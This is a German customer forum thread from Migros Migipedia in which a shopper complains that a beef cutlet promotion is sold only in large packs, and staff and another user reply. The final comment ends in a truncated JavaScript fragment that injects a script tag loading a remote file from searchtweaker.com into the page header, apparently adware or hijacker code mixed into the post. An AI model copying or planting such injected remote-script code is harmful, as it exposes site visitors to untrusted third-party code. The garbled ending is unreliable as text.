Aktion Rindsplätzli a la minute | Migros Migipedia
Startseite

Aktion Rindsplätzli a la minute

Aktion Rindsplätzli a la minute

KarlESch
KarlESchvor 7 Jahren
Da wird eine Aktion angekündigt, aber einmal mehr ist die Ware nur in der Grosspackung erhältlich! Das freut alle Kleinhaushalte, also wohl die Mehrheit der KundInnen. Um dem ganzen noch die Krone aufzusetzen, sind Plätzli zum normalen Preis in normalen Portionen nicht erhältlich. Was zum Teufel soll ich als Single mit 400 Gramm Rindsplätzli?

4 Antworten

Letzte Aktivität vor 7 Jahren
  • Antonia_Migros
    Antonia_Migrosvor 7 Jahren
    Hallo KarlESch,



    vielen Dank für deinen Kommentar. Ich kann verstehen, dass du dich darüber ärgerst, dass Aktionen nicht für verschieden grosse Haushalte angeboten werden. Und dass es dann auch keine Plätzli ohne Aktion in kleineren Verpackungen zu kaufen gab, ist zusätzlich blöd. Ich werde dies gerne an die zuständigen Personen weiterleiten und bitten, dies zukünftig zu beachten. Könntest du mir dazu noch die Region oder die Filiale angeben, in der du einkaufst?




    Lieben Gruss,


    Antonia, Migipedia-Team
  • KarlESch
    KarlESchvor 7 Jahren
    Diese Unsitte ist offenbar bei den M der Migros Ostschweiz üblich, ganz egal ob es sich um Bratwürste, Weisswürste oder eben Plätzli handelt.
  • Imperator
    Imperatorvor 7 Jahren
    Einerseits gebe ich dir recht! Manchmal ist es nervig für Kleinhaushalte wenn nur grosse Packungen erhältlich sind.?
    Aber ein Problem ist das in der heutigen Zeit auch nicht.
    Ich als Singel, resp. seit meine Mutter bei mir lebt als Kleinhaushalt, kaufe trotzdem grosse Packungen.
    Was nicht gebraucht wird, kann man Portionen weise einfrieren.
    Wenn man es nicht übertreibt, reicht dafür auch ein kleines Tiefkühlfach im Kühlschrank.?
    Ist ja so gesehen keine grosse Vorratshaltung sondern mehr eine überbrückung.
  • KarlESch
    KarlESchvor 7 Jahren
    Es ist mir auch schon aufgefallen, dass man das Tiefkühlfach für Reste von Grossportionen benutzen kann. Nur bin ich etwas skeptisch gegenüber dieser Methode. Ausserdem weiss man nie, ob die Ware schon einmal eingefroren wurde. Dann empfiehlt es sich nicht, das nochmals zu tun. Zudem leidet die Qualität beim Gefrieren.
    Vielleicht könnte die Migros wenigstens den Hinweis "zum Tiefkühlen geeignet" anbringen. Das hätte auf den zu grossen Packungen gewiss noch irgendwo Platz.
    Dennoch ist es unter keinem Titel zu rechtfertigen, dass bei solchen Aktionen die normalen Packungen zu normalen Preisen aus dem Verkauf genommen werden.
    www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); //